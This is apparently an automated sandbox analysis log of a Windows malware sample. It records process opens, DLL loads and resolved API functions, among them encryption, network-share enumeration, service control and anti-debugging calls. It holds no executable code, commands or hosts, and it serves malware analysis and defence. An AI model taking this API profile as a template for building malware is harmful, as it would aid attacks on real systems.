Open c:\program files (x86)\msbuild\dependent programs keith.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft.net\pages_hack_associates.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows mail\keno.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\internet explorer\ci helicopter.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\texas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\owners.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\google\linear ratios.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\common files\columbus_rats_trailer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (317)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load RPCRT4.dll base_address = 0x75ee0000 True 1
Fn
Load MPR.dll base_address = 0x74a90000 True 1
Fn
Load WININET.dll base_address = 0x753d0000 True 1
Fn
Load WINMM.dll base_address = 0x74a50000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load ADVAPI32.dll base_address = 0x74d40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x75220000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x74a30000 True 1
Fn
Load WS2_32.dll base_address = 0x75bc0000 True 1
Fn
Load DNSAPI.dll base_address = 0x749d0000 True 1
Fn
Load CRYPT32.dll base_address = 0x759b0000 True 1
Fn
Load msvcr100.dll base_address = 0x74910000 True 1
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x75f01635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x75f21ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75f5d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x75eff48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x74a92dd6 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x74a92f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x74a93058 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74a526e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x753545bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7534d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x76c31986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x76c3492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74a39263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x749e572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x749d436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7492c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
